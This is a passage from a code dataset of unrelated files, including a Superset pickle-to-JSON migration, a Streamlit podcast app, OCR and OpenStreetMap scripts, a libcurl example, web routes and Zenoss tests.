pccd.compute_energy()\n\n\n\n","repo_name":"ncrubin/qcpanop","sub_path":"qcpanop/cc/projective_cc/pccd.py","file_name":"pccd.py","file_ext":"py","file_size_in_byte":9783,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"25167550135","text":"revision = \"9c2a5681ddfd\"\ndown_revision = \"f3c2d8ec8595\"\n\nimport io\nimport json\nimport pickle\n\nfrom alembic import op\nfrom sqlalchemy import Column, Integer, LargeBinary, String\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import Session\n\nfrom superset import db\nfrom superset.migrations.shared.utils import paginated_update\n\nBase = declarative_base()\nVALUE_MAX_SIZE = 2**24 - 1\nRESOURCES_TO_MIGRATE = (\"app\", \"dashboard_permalink\", \"explore_permalink\")\n\n\nclass RestrictedUnpickler(pickle.Unpickler):\n def find_class(self, module, name):\n if not (module == \"superset.utils.core\" and name == \"DatasourceType\"):\n raise pickle.UnpicklingError(f\"Unpickling of {module}.{name} is forbidden\")\n\n return super().find_class(module, name)\n\n\nclass KeyValueEntry(Base):\n __tablename__ = \"key_value\"\n id = Column(Integer, primary_key=True)\n resource = Column(String(32), nullable=False)\n value = Column(LargeBinary(length=VALUE_MAX_SIZE), nullable=False)\n\n\ndef upgrade():\n bind = op.get_bind()\n session: Session = db.Session(bind=bind)\n truncated_count = 0\n for entry in paginated_update(\n session.query(KeyValueEntry).filter(\n KeyValueEntry.resource.in_(RESOURCES_TO_MIGRATE)\n )\n ):\n try:\n value = RestrictedUnpickler(io.BytesIO(entry.value)).load() or {}\n except pickle.UnpicklingError as ex:\n if str(ex) == \"pickle data was truncated\":\n # make truncated values that were created prior to #20385 an empty\n # dict so that downgrading will work properly.\n truncated_count += 1\n value = {}\n else:\n raise\n\n entry.value = bytes(json.dumps(value), encoding=\"utf-8\")\n\n if truncated_count:\n print(f\"Replaced {truncated_count} corrupted values with an empty value\")\n\n\ndef downgrade():\n bind = op.get_bind()\n session: Session = db.Session(bind=bind)\n for entry in paginated_update(\n session.query(KeyValueEntry).filter(\n KeyValueEntry.resource.in_(RESOURCES_TO_MIGRATE)\n ),\n ):\n value = json.loads(entry.value) or {}\n entry.value = pickle.dumps(value)\n","repo_name":"apache/superset","sub_path":"superset/migrations/versions/2023-05-01_12-03_9c2a5681ddfd_convert_key_value_entries_to_json.py","file_name":"2023-05-01_12-03_9c2a5681ddfd_convert_key_value_entries_to_json.py","file_ext":"py","file_size_in_byte":2232,"program_lang":"python","lang":"en","doc_type":"code","stars":55269,"dataset":"github-code","pt":"61"}
+{"seq_id":"18430587700","text":"import streamlit as st\nimport modal\nimport json\nimport os\n\nst.set_page_config(\n page_title=\"PhilosoCasts\",\n page_icon=\"🎧\",\n# layout=\"wide\",\n# initial_sidebar_state=\"expanded\",\n)\n\ndef main():\n st.title(\"🤔 PhilosoCasts! 🎧 \")\n\n available_podcast_info = create_dict_from_json_files('.')\n\n # Left section - Input fields\n st.sidebar.header(\"Convert your favorite Podcasts into short Platonic Dialogues!\")\n\n # Dropdown box\n st.sidebar.subheader(\"Available Podcasts Feeds to Try!\")\n selected_podcast = st.sidebar.selectbox(\"Select Podcast:\", options=available_podcast_info.keys())\n\n if selected_podcast:\n\n podcast_info = available_podcast_info[selected_podcast]\n\n # # Right section - Newsletter content\n # st.header(\"Newsletter Content\")\n\n # Display the podcast title\n\n st.write(podcast_info['podcast_details']['episode_title'])\n\n # Display the podcast summary and the cover image in a side-by-side layout\n col1, col2 = st.columns([7, 3])\n\n with col1:\n # Display the podcast episode summary\n st.subheader(\"Key Arguments from Podcast\")\n st.write(podcast_info['podcast_summary'])\n\n with col2:\n st.image(podcast_info['podcast_details']['episode_image'], caption=\"Podcast Cover\", width=300, use_column_width=True)\n\n # Display the podcast guest and their details in a side-by-side layout\n col3, col4 = st.columns([3, 7])\n\n with col3:\n st.subheader(\"Podcast Guest\")\n st.write(podcast_info['podcast_guest']['name'])\n\n with col4:\n st.subheader(\"Podcast Guest Details\")\n st.write(podcast_info[\"podcast_guest\"]['summary'])\n\n # Display the five key moments\n st.subheader(\"Key Moments\")\n key_moments = podcast_info['podcast_highlights']\n for moment in key_moments.split('\\n'):\n st.markdown(\n f\"{moment}
\", unsafe_allow_html=True)\n\n # User Input box\n st.markdown(\"---\")\n st.sidebar.image(\"assets/plato.png\")\n st.sidebar.subheader(\"Philosocast Your Own Podcast Feed:\")\n\n openai_api_key = st.sidebar.text_input(\n label=\"Get your [OpenAI API Key](https://platform.openai.com/account/api-keys)\", placeholder=\"Paste your OpenAI API Key here (sk-...)\",\n type='password'\n)\n url = st.sidebar.text_input(\"Get a [Podcast RSS Feed](https://www.listennotes.com/)\", placeholder =\"Paste RSS Feed link\")\n\n process_button = st.sidebar.button(\"Philosocast Your Podcast Feed!\")\n st.sidebar.markdown(\"**Note**: Philosocasting can take up to 5 minutes, please be patient...philosophizing ain't easy 😜\")\n\n if process_button:\n\n # Call the function to process the URLs and retrieve podcast guest information\n podcast_info = process_podcast_info(url)\n\n # Right section - Newsletter content\n st.header(\"Newsletter Content\")\n\n # Display the podcast title\n st.subheader(\"Episode Title\")\n st.write(podcast_info['podcast_details']['episode_title'])\n\n # Display the podcast summary and the cover image in a side-by-side layout\n col1, col2 = st.columns([7, 3])\n\n with col1:\n # Display the podcast episode summary\n st.subheader(\"Podcast Episode Summary\")\n st.write(podcast_info['podcast_summary'])\n\n with col2:\n st.image(podcast_info['podcast_details']['episode_image'], caption=\"Podcast Cover\", width=300, use_column_width=True)\n\n # Display the podcast guest and their details in a side-by-side layout\n col3, col4 = st.columns([3, 7])\n\n with col3:\n st.subheader(\"Podcast Guest\")\n st.write(podcast_info['podcast_guest']['name'])\n\n with col4:\n st.subheader(\"Podcast Guest Details\")\n st.write(podcast_info[\"podcast_guest\"]['summary'])\n\n # Display the five key moments\n st.subheader(\"What would other philosophers say about this episode? 🤔\")\n key_moments = podcast_info['podcast_highlights']\n for moment in key_moments.split('\\n'):\n st.markdown(\n f\"{moment}
\", unsafe_allow_html=True)\n\ndef create_dict_from_json_files(folder_path):\n json_files = [f for f in os.listdir(folder_path) if f.endswith('.json')]\n data_dict = {}\n\n for file_name in json_files:\n file_path = os.path.join(folder_path, file_name)\n with open(file_path, 'r') as file:\n podcast_info = json.load(file)\n podcast_name = podcast_info['podcast_details']['podcast_title']\n # Process the file data as needed\n data_dict[podcast_name] = podcast_info\n\n return data_dict\n\ndef process_podcast_info(url):\n f = modal.Function.lookup(\"corise-podcast-project\", \"process_podcast\")\n output = f.call(url, '/content/podcast/')\n return output\n\nif __name__ == '__main__':\n main()\n","repo_name":"ughdeeb/philosocasts","sub_path":"Home.py","file_name":"Home.py","file_ext":"py","file_size_in_byte":4984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"42357610524","text":"import re\n\nimport cv2\nimport pytesseract\nfrom pytesseract import Output\n\n\ndef detect_text(image, lib=None):\n if lib == 'TESSERACT':\n return detect_text_with_tesseract(image)\n else:\n print('OCR library not specified. Running Tesseract.')\n return detect_text_with_tesseract(image)\n\n\ndef detect_text_with_tesseract(image):\n d = pytesseract.image_to_data(image, output_type=Output.DICT)\n n_boxes = len(d['level'])\n boxes = cv2.cvtColor(image.copy(), cv2.COLOR_BGR2RGB)\n for i in range(n_boxes):\n (x, y, w, h) = (d['left'][i], d['top'][i], d['width'][i], d['height'][i])\n boxes = cv2.rectangle(boxes, (x, y), (x + w, y + h), (0, 255, 0), 2)\n\n lines = pytesseract.image_to_string(image)\n\n result = list(filter(lambda x: len(x) != 0, lines.splitlines()))\n\n res = parse_item_lines(result)\n return boxes, res\n\n\ndef format_dollar_value(value):\n # Match the dollar value using regex\n match = re.match(r'^(\\$?\\d+)\\.(\\d+)$|^(\\$?\\d+)$|^\\.(\\d+)$|^(\\d+)\\.(\\d+)$|^(\\d+)$', value)\n if match:\n # Extract the numbers before and after the decimal point\n groups = match.groups()\n dollars = int(groups[0] or groups[2] or groups[4] or groups[5] or groups[6] or 0)\n cents = int(groups[1] or groups[3] or 0)\n # Format the numbers as xx.xx\n return \"{:02d}.{:02d}\".format(dollars, cents)\n else:\n # Return the original value if it doesn't match the expected format\n return value\n\n\ndef parse_item_lines(lines):\n regex = r'^(\\w+(?:[\\s+\\w+~.])*)\\s+((\\$?\\d*(?: *\\.\\d+)?|\\$?\\d*(?:\\.\\d+ *)?))$'\n\n res = []\n for line in lines:\n parsed_line = re.match(regex, line)\n if parsed_line:\n name = parsed_line.group(1)\n value = parsed_line.group(2)\n\n value = format_dollar_value(value.removeprefix('$'))\n\n item = {\"name\": name, \"value\": value}\n res.append(item)\n return res","repo_name":"wongyuhao/MOMO","sub_path":"text_detection.py","file_name":"text_detection.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"39135194903","text":"\r\nimport xml.etree.cElementTree as ET\r\nfrom collections import defaultdict\r\nimport re\r\nimport pprint\r\nimport codecs\r\n\r\n\r\nOSMFILE = \"san-francisco_california.osm\"\r\n\r\n# Definition of re expressions\r\nstreet_type_re = re.compile(r'\\b\\S+\\.?$', re.IGNORECASE)\r\npostcode_re = re.compile(r'[a-z=\\+/&<>;\\_\\'\"\\?%#$@\\,\\. \\t\\r\\n]', re.IGNORECASE)\r\nname_re = re.compile(r'^[0-9]+$')\r\n\r\n# List of expected street types\r\nexpected = [\"Street\", \"Avenue\", \"Boulevard\", \"Drive\", \"Court\", \"Place\", \"Square\", \"Lane\", \"Road\", \r\n \"Trail\", \"Parkway\", \"Commons\", \"Circle\", \"Alley\", \"Terrace\", \"Path\", \"Highway\", \"Center\", \"Crescent\", \"Way\", \"Walk\", \"Plaza\", \"Loop\", \"View\", \"Mall\", \"Freeway\", \"Lane\"]\r\n\r\n\r\ndef audit_street_type(street_types, street_name):\r\n m = street_type_re.search(street_name)\r\n if m:\r\n street_type = m.group()\r\n if street_type not in expected:\r\n street_types[street_type].add(street_name)\r\n\r\ndef audit_state_name(state_names, state_name):\r\n if state_name != 'CA':\r\n state_names.append(state_name)\r\n\r\ndef audit_postcode(postcodes, postcode):\r\n m = postcode_re.search(postcode)\r\n if m:\r\n postcodes.append(postcode)\r\n\r\ndef audit_city_name(city_names, city_name):\r\n m = name_re.search(city_name)\r\n if m:\r\n city_names.append(city_name)\r\n\r\ndef is_street_name(elem):\r\n return (elem.attrib['k'] == \"addr:street\")\r\n\r\ndef is_postcode_name(elem):\r\n return (elem.attrib['k'] == \"addr:postcode\")\r\n\r\ndef is_state_name(elem):\r\n return (elem.attrib['k'] == \"addr:state\")\r\n\r\ndef is_city_name(elem):\r\n return (elem.attrib['k'] == \"addr:city\")\r\n\r\ndef audit(osmfile):\r\n \r\n osm_file = open(osmfile, \"r\")\r\n street_types = defaultdict(set)\r\n state_names = []\r\n postcodes = []\r\n city_names = []\r\n for event, elem in ET.iterparse(osm_file, events=(\"start\",)):\r\n\r\n if elem.tag == \"node\" or elem.tag == \"way\":\r\n for tag in elem.iter(\"tag\"):\r\n # Audit street type\r\n if is_street_name(tag):\r\n audit_street_type(street_types, tag.attrib['v'])\r\n # Audit postcode\r\n if is_postcode_name(tag):\r\n audit_postcode(postcodes, tag.attrib['v'])\r\n # Audit state name\r\n if is_state_name(tag):\r\n audit_state_name(state_names, tag.attrib['v'])\r\n # Audit city name\r\n if is_city_name(tag):\r\n audit_city_name(city_names, tag.attrib['v'])\r\n\r\n return street_types, state_names, postcodes, city_names\r\n\r\n\r\ndef process_audit():\r\n street_types, state_names, postcodes, city_names = audit(OSMFILE)\r\n pprint.pprint(street_types)\r\n pprint.pprint(state_names)\r\n pprint.pprint(postcodes)\r\n pprint.pprint(city_names)\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n process_audit()","repo_name":"Anumehra/Udacity","sub_path":"Data Wrangling Final Project/Code/auditing_data.py","file_name":"auditing_data.py","file_ext":"py","file_size_in_byte":2853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"25907410486","text":"#coding=utf-8\n'''\nCreated on 2016年6月27日\n\n@author: BFD_487\n'''\nimport urllib2\nimport json\n\ndef download():\n url = \"http://waimai.baidu.com/waimai/shoplist/7033186bfbbe1a70?sortby=distance&display=json&page=1&count=40\";\n request = urllib2.Request(url);\n request.add_header(\"Cookie\", '''wm_search_addr=[{\"name\":\"%E5%8C%97%E8%BE%B0%E4%B8%96%E7%BA%AA%E4%B8%AD%E5%BF%83A%E5%BA%A7\",\"address\":\"%E5%8C%97%E8%BE%B0%E8%A5%BF%E8%B7%AF8%E5%8F%B7%E9%99%A22%E5%8F%B7\",\"lat\":4839166.18,\"lng\":12957111.44,\"shopnum\":1081,\"city_id\":131}]''');\n response = urllib2.urlopen(request);\n responseJson = response.read();\n pagedata = json.loads(responseJson);\n shopinfo = pagedata[\"result\"][\"shop_info\"];\n \n shoplist = [];\n for shop in shopinfo:\n shopdata = {};\n# shop_name = shop[\"shop_name\"];\n shopdata[\"shop_name\"] = shop[\"shop_name\"];\n #起送价格\n# takeout_price = shop[\"takeout_price\"];\n shopdata[\"takeout_price\"] = shop[\"takeout_price\"];\n #配送时间\n# delivery_time = shop[\"delivery_time\"];\n shopdata[\"delivery_time\"] = shop[\"delivery_time\"];\n #平均得分\n# average_score = shop[\"average_score\"];\n shopdata[\"average_score\"] = shop[\"average_score\"];\n #月销量\n# saled_month = shop[\"saled_month\"];\n shopdata[\"saled_month\"] = shop[\"saled_month\"];\n #起送价格\n# takeout_cost = shop[\"takeout_cost\"];\n shopdata[\"takeout_cost\"] = shop[\"takeout_cost\"];\n \n welfarelist = [];\n for welfare in shop[\"welfare_info\"]:\n welfarelist.append(welfare[\"msg\"]);\n shopdata[\"welfare_info\"] = welfarelist;\n shoplist.append(shopdata);\n return json.dumps(shoplist)\n\nif __name__ == '__main__':\n file = open(\"shopinfo.data\", 'w')\n file.write(str(download()))","repo_name":"baifendian/Life_Big_Bang","sub_path":"hackcrawler/com/yue/baidutakeout/DownloadShopInfo.py","file_name":"DownloadShopInfo.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"8232466766","text":"import sys\nimport ctypes as ct\n\nimport libcurl as lcurl\nfrom curltestutils import * # noqa\n\n\nclass MemoryStruct(ct.Structure):\n _fields_ = [\n (\"memory\", ct.c_void_p),\n (\"size\", ct.c_size_t),\n]\n\ndef init_memory(chunk: MemoryStruct):\n chunk.memory = libc.malloc(1) # grown as needed with realloc\n chunk.size = 0 # no data at this point\n\n\n@lcurl.write_callback\ndef write_function(buffer, size, nitems, stream):\n chunk = ct.cast(stream, ct.POINTER(MemoryStruct)).contents\n buffer_size = size * nitems\n\n memory = libc.realloc(chunk.memory, chunk.size + buffer_size + 1)\n if not memory:\n # out of memory!\n print(\"not enough memory (realloc returned NULL)\")\n return 0\n\n chunk.memory = memory\n ct.memmove(chunk.memory + chunk.size, buffer, buffer_size)\n chunk.size += buffer_size\n ct.memset(chunk.memory + chunk.size, 0, 1)\n return buffer_size\n\n\ndef main(argv=sys.argv[1:]):\n\n url: str = argv[0] if len(argv) >= 1 else \"https://www.example.org/\"\n\n chunk = MemoryStruct()\n init_memory(chunk)\n\n post_this = b\"Field=1&Field=2&Field=3\"\n\n lcurl.global_init(lcurl.CURL_GLOBAL_ALL)\n # init the curl session\n curl: ct.POINTER(lcurl.CURL) = lcurl.easy_init()\n\n with curl_guard(True, curl):\n if not curl:\n libc.free(chunk.memory)\n return 1\n\n # specify URL\n lcurl.easy_setopt(curl, lcurl.CURLOPT_URL, url.encode(\"utf-8\"))\n if defined(\"SKIP_PEER_VERIFICATION\"):\n lcurl.easy_setopt(curl, lcurl.CURLOPT_SSL_VERIFYPEER, 0)\n # send all data to this function \n lcurl.easy_setopt(curl, lcurl.CURLOPT_WRITEFUNCTION, write_function)\n # we pass our 'chunk' struct to the callback function\n lcurl.easy_setopt(curl, lcurl.CURLOPT_WRITEDATA, ct.byref(chunk))\n # some servers do not like requests that are made without a user-agent\n # field, so we provide one\n lcurl.easy_setopt(curl, lcurl.CURLOPT_USERAGENT, b\"libcurl-agent/1.0\")\n lcurl.easy_setopt(curl, lcurl.CURLOPT_POSTFIELDS, post_this)\n # if we do not provide POSTFIELDSIZE, libcurl will len() by itself\n lcurl.easy_setopt(curl, lcurl.CURLOPT_POSTFIELDSIZE, len(post_this))\n\n # Perform the request, res will get the return code\n res: int = lcurl.easy_perform(curl)\n\n # Check for errors\n if res != lcurl.CURLE_OK:\n handle_easy_perform_error(res)\n else:\n # Now, our chunk.memory points to a memory block that is chunk.size\n # bytes big and contains the remote file.\n #\n # Do something nice with it!\n print(\"%s\" % ct.cast(chunk.memory, ct.c_char_p).value.decode(\"utf-8\"))\n\n # Cleanup\n libc.free(chunk.memory)\n\n return 0\n\n\nsys.exit(main())\n","repo_name":"karpierz/libcurl","sub_path":"examples/postinmemory.py","file_name":"postinmemory.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"27916087224","text":"from django.urls import path\n\nfrom . import views\n\n\nurlpatterns = [\n path(\"apply-loan\", views.apply_loan, name=\"apply_loan\"),\n path(\"request-to-repay-loan\", views.request_to_repay_loan, name=\"request_to_repay_loan\"), \n path(\"manual-repay-loan\", views.manual_repay_loan, name=\"repay_loan\"), \n path(\"view-loans/\", views.view_loans, name=\"view_loans\"), \n path(\"view-loan\", views.view_loan, name=\"view_loans\"), \n path(\"approve-loan\", views.approve_loan, name=\"approve_loan\"), \n path(\"close-loan\", views.close_loan, name=\"close loan\"), \n path(\"add-loan-security\", views.add_loan_security, name=\"add_loan_security\"), \n\n path(\"create-loan-product\", views.create_loan_product, name=\"create_loan_product\"),\n path(\"add-loan-product-charge\", views.add_loan_product_charge, name=\"add_loan_product_charge\"),\n path(\"set-unrealized-interest-wallet\", views.apply_loan, name=\"apply_loan\"),\n]\n","repo_name":"Taridi-Financial/cobanking","sub_path":"cbsaas/lending/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1844195713","text":"from flask import Blueprint, jsonify, request\nfrom database import db\n\nfrom models.Room import Room, RoomTypes\nfrom models.Image import Image\nfrom models.Reservation import Reservation, Status\nfrom models.User import User\nfrom models.Review import Review\nfrom models.Thread import Thread\nfrom models.Message import Message\n\nimport json\nimport random\nimport time\nfrom datetime import datetime, timedelta\nimport string\n\nreservations_blueprint = Blueprint('reservations', __name__)\n\n\n@reservations_blueprint.route(\"/rooms//reservations/unavailable_dates\", methods=['GET', 'POST'])\ndef unavailable_dates(room_id):\n if request.method == 'GET':\n room = Room.query.filter_by(id=room_id).first()\n\n if room is None:\n return jsonify({'message': 'ERROR'})\n\n reservations_dict = []\n for i in room.reservations:\n if i.status == Status.not_available:\n reservations_dict.append(i.to_dict())\n return jsonify(reservations_dict)\n elif request.method == 'POST':\n room = Room.query.filter_by(id=room_id).first()\n\n new_reservations = request.get_json()\n print(new_reservations)\n new_reservations = new_reservations['new_reservations']\n\n reservations = new_reservations['reservations']\n renter_public_id = new_reservations['public_user_id']\n renter = User.query.filter_by(public_id=renter_public_id).first()\n\n if room is None:\n return jsonify({'message': 'ERROR'})\n\n for r in room.reservations:\n db.session.delete(r)\n for a in reservations:\n d_from = datetime.strptime(a['date_from'], \"%Y-%m-%d\")\n if a['date_to'] is None:\n d_to = None\n else:\n d_to = datetime.strptime(a['date_to'], \"%Y-%m-%d\")\n\n room.reservations.append(Reservation(d_from, d_to, Status.not_available, renter.id))\n\n db.session.commit()\n return jsonify({'message': 'SUCCESS'})\n\n\n@reservations_blueprint.route(\"/rooms//reservations\", methods=['GET', 'PUT'])\ndef set_reservations(room_id):\n if request.method == 'GET':\n room = Room.query.filter_by(id=room_id).first()\n\n if room is None:\n return jsonify({'message': 'ERROR'})\n\n reservations_dict = []\n for i in room.reservations:\n reservations_dict.append(i.to_dict())\n return jsonify(reservations_dict)\n\n elif request.method == 'PUT':\n room = Room.query.filter_by(id=room_id).first()\n\n if room is None:\n return jsonify({'message': 'ERROR'})\n\n new_reservation = request.get_json()\n new_reservation = new_reservation['reservation']\n\n d_from = datetime.strptime(new_reservation['date_from'], \"%Y-%m-%d\")\n if new_reservation['date_to'] is None:\n d_to = None\n else:\n d_to = datetime.strptime(new_reservation['date_to'], \"%Y-%m-%d\")\n\n renter_public_id = new_reservation['public_user_id']\n renter = User.query.filter_by(public_id=renter_public_id).first()\n\n room.reservations.append(Reservation(d_from, d_to, Status.rented, renter.id))\n\n db.session.commit()\n return jsonify({'message': 'SUCCESS'})\n","repo_name":"giatrakosg/treehouse","sub_path":"backend/routes/Reservations.py","file_name":"Reservations.py","file_ext":"py","file_size_in_byte":3248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5071211046","text":"from django import forms\nfrom django.core.mail import send_mail\nfrom django.forms.models import inlineformset_factory\n\nfrom profiles.models import Profile, GiftGroup, Invitation, Membership\n\nfrom pagedown.widgets import PagedownWidget\n\n\nclass ProfileForm(forms.ModelForm):\n class Meta:\n model = Profile\n fields = []\n\n\nclass ContactForm(forms.Form):\n subject = forms.CharField(max_length=100, required=False)\n message = forms.CharField(widget=forms.Textarea)\n\n def send_email(self, from_email, to_email):\n subject_prefix = '[ChrAppy] '\n subject = subject_prefix + self.cleaned_data['subject']\n message = self.cleaned_data['message']\n message += '\\n\\n(Please do not reply directly to this email - nobody will read it!)'\n\n send_mail(subject, message, from_email, [to_email])\n\n\nclass MembershipForm(forms.ModelForm):\n \"\"\"Membership form for before pairs have been assigned.\"\"\"\n avoid = forms.ModelMultipleChoiceField(\n queryset=None,\n required=False,\n widget=forms.CheckboxSelectMultiple,\n help_text=\"You may still be assigned a person who you've asked to avoid.\")\n prefer = forms.ModelMultipleChoiceField(\n queryset=None,\n required=False,\n widget=forms.CheckboxSelectMultiple,\n help_text=\"You might not be assigned any of the people who you've preferred.\")\n partner = forms.ModelChoiceField(queryset=None, required=False)\n wishlist = forms.CharField(widget=PagedownWidget())\n\n def __init__(self, *args, **kwargs):\n # Pop so __init__ doesn't recieve unexpected kwargs\n self.request = kwargs.pop('request')\n self.membership = kwargs.pop('membership')\n super(MembershipForm, self).__init__(*args, **kwargs)\n # Exclude current user from choice field querysets\n # and only include members of current group\n giftgroup = self.membership.giftgroup\n invitations = Invitation.objects.filter(\n gift_group=giftgroup).exclude(to_name=self.request.user.username)\n self.fields['avoid'].queryset = invitations\n self.fields['prefer'].queryset = invitations\n self.fields['partner'].queryset = invitations\n\n class Meta:\n model = Membership\n fields = ['wishlist', 'partner', 'avoid_partner', 'prefer', 'avoid']\n\n\nclass MembershipPairedForm(forms.ModelForm):\n \"\"\"Membership form for after pairs have been assigned.\"\"\"\n wishlist = forms.CharField(widget=PagedownWidget())\n\n def __init__(self, *args, **kwargs):\n # Pop so __init__ doesn't recieve unexpected kwargs\n self.request = kwargs.pop('request')\n self.membership = kwargs.pop('membership')\n super(MembershipPairedForm, self).__init__(*args, **kwargs)\n\n class Meta:\n model = Membership\n fields = ['wishlist']\n\n\nclass GroupForm(forms.ModelForm):\n class Meta:\n model = GiftGroup\n fields = ['name']\n\nInvitationFormSet = inlineformset_factory(\n GiftGroup, Invitation, fields=['to_name', 'to_email'])\n","repo_name":"dangerdak/chrapp","sub_path":"profiles/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"17617728943","text":"import os, sys\nif __name__ == '__main__':\n execfile(os.path.join(sys.path[0], 'framework.py'))\n\nfrom zExceptions import Redirect\n\nfrom Products.ZenModel.Exceptions import *\nfrom Products.ZenModel.DeviceClass import *\nfrom Products.ZenModel.Device import Device\nfrom Products.Zuul import getFacade\nfrom ZenModelBaseTest import ZenModelBaseTest\n\nclass TestDeviceClass(ZenModelBaseTest):\n\n def afterSetUp(self):\n super(TestDeviceClass, self).afterSetUp()\n devices = self.dmd.Devices\n self.routers = devices.createOrganizer(\"/NetworkDevice/Router\")\n devices.createOrganizer(\"/NetworkDevice/Router/Firewall\")\n devices.createOrganizer(\"/NetworkDevice/Router/RSM\")\n devices.createOrganizer(\"/Server\")\n self.dev = self.dmd.Devices.createInstance(\"testdev\")\n self.dev2 = self.dmd.Devices.createInstance(\"testdev2\")\n self.dev3 = self.routers.createInstance(\"testrouter\")\n\n def testCreateInstanceDevice(self):\n devices = self.dmd.Devices\n self.assert_(isinstance(self.dev, Device))\n self.assertEqual(self.dev.deviceClass(), devices)\n self.assertEqual(self.dev.getDeviceClassName(), \"/\")\n self.assertEqual(devices.countDevices(), 3)\n self.assert_(self.dev in devices.getSubDevices())\n self.assertEqual(devices.getPythonDeviceClass(), Device)\n\n \n def testCreateInstanceDeviceAndIndex(self):\n devices = self.dmd.Devices\n self.assert_(isinstance(self.dev, Device))\n self.assertEqual(self.dev.deviceClass(), devices)\n self.assertEqual(self.dev.getDeviceClassName(), \"/\")\n\n\n def testSearchDevicesOneDevice(self):\n devices = self.dmd.Devices\n self.assertEqual( len( devices._findDevice(\"testdev2\") ), 1 )\n\n \n def testSearchDevicesNoDevice(self):\n devices = self.dmd.Devices\n self.assertEqual(len(devices._findDevice(\"adsf\")), 0)\n\n \n def testSearchDevicesMultipleDevices(self):\n devices = self.dmd.Devices\n self.assertEqual(len(devices._findDevice(\"testdev*\")), 2)\n\n def testSearchDevicesByTitle(self):\n self.dev2.setTitle('testtitle2')\n foundDevices = self.dmd.Devices._findDevice('testtitle2')\n self.assertEqual( len( foundDevices ), 1 )\n self.assertEqual( foundDevices[0].id, self.dev2.id )\n \n def testFindExact(self):\n id = 'testdev'\n devices = self.dmd.Devices\n devices.createInstance('TESTDEV')\n #inexact\n self.assertEqual(len(devices._findDevice(id)), 2)\n #exact\n\n dev = devices.findDeviceByIdExact(id)\n self.assertEqual( dev.id, id )\n \n self.assert_( not devices.findDeviceByIdExact(None) )\n self.assert_( not devices.findDeviceByIdExact('badid') )\n\n def test_FindDevices(self):\n devBrains = self.dmd.Devices._findDevice( 'testdev' )\n self.assertEqual( len( devBrains ), 1 )\n dev = devBrains[0].getObject()\n self.assertEqual( dev.id, 'testdev' )\n dev.setTitle('testdev2')\n devBrains = self.dmd.Devices._findDevice( 'testdev2' )\n self.assertEqual( len( devBrains ), 2 )\n self.assertEqual( devBrains[0].getObject().id, 'testdev2' )\n self.assertEqual( devBrains[1].getObject().id, 'testdev' )\n devBrains = self.dmd.Devices._findDevice( 'testdev2', False )\n self.assertEqual( len(devBrains), 1 )\n self.assertEqual( devBrains[0].getObject().id, 'testdev2' )\n devBrains = self.dmd.Devices._findDevice( 'badid' )\n self.assert_( not devBrains )\n\n def testFindDevice(self):\n dev = self.dmd.Devices.findDevice( 'testdev' )\n self.assertEqual( dev.id, 'testdev' )\n dev.setTitle('testdev2')\n dev = self.dmd.Devices.findDevice( 'testdev2' )\n self.assertEqual( dev.id, 'testdev2' )\n dev.setTitle( 'testtitle' )\n dev = 
self.dmd.Devices.findDevice( 'testtitle' )\n self.assertEqual( dev.id, 'testdev2' )\n dev = self.dmd.Devices.findDevice( 'badid' )\n self.assert_( dev is None )\n\n\n def testFindDeviceByIdOrIp(self):\n dev = self.dmd.Devices.findDeviceByIdOrIp( 'testdev' )\n self.assertEqual( dev.id, 'testdev' )\n dev.setManageIp( '1.1.1.1' )\n dev = self.dmd.Devices.findDeviceByIdOrIp( '1.1.1.1' )\n self.assertEqual( dev.id, 'testdev' )\n dev = self.dmd.Devices.findDeviceByIdOrIp( 'badid' )\n self.assert_( dev is None )\n\n def testGetPeerDeviceClassNames(self):\n dcnames = self.dev3.getPeerDeviceClassNames()\n self.assert_(\"/NetworkDevice/Router\" in dcnames)\n self.assert_(\"/NetworkDevice/Router/Firewall\" in dcnames)\n self.assert_(\"/NetworkDevice/Router/RSM\" in dcnames)\n\n self.routers.moveDevices('/','testrouter')\n self.assert_(self.dev3 in self.dmd.Devices.getSubDevices())\n self.assert_(self.dev3 not in \n self.dmd.Devices.NetworkDevice.Router.getSubDevices())\n \n\n def testZPythonClass(self):\n from Products.ZenModel.tests.CustDevice import CustDevice\n custdev = self.dmd.Devices.createOrganizer(\"/CustDev\")\n custdev._setProperty('zPythonClass',\n 'Products.ZenModel.tests.CustDevice')\n self.assertEqual(CustDevice, \n self.dmd.Devices.CustDev.getPythonDeviceClass())\n\n def testMoveDevices(self):\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n dev = self.dmd.Devices.Server.devices.testdev\n self.assert_(dev.os.interfaces)\n\n def testMoveDevicesRetainsGuid(self):\n guid = IGlobalIdentifier(self.dev).getGUID()\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n newguid = IGlobalIdentifier(self.dmd.Devices.Server.devices.testdev).getGUID()\n self.assertEqual(guid, newguid)\n path = self.dmd.guid_table.get(newguid, None)\n self.assertEqual(path, '/zport/dmd/Devices/Server/devices/testdev')\n\n def testMoveDevicesRetainsProductionState(self):\n self.dev._setProductionState(99)\n self.dev.setPreMWProductionState(98)\n self.dmd.Devices.moveDevices('/Server', 'testdev')\n newProdState = self.dmd.Devices.Server.devices.testdev.getProductionState()\n newPreMWProdState = self.dmd.Devices.Server.devices.testdev.getPreMWProductionState()\n self.assertEqual(newProdState, 99)\n 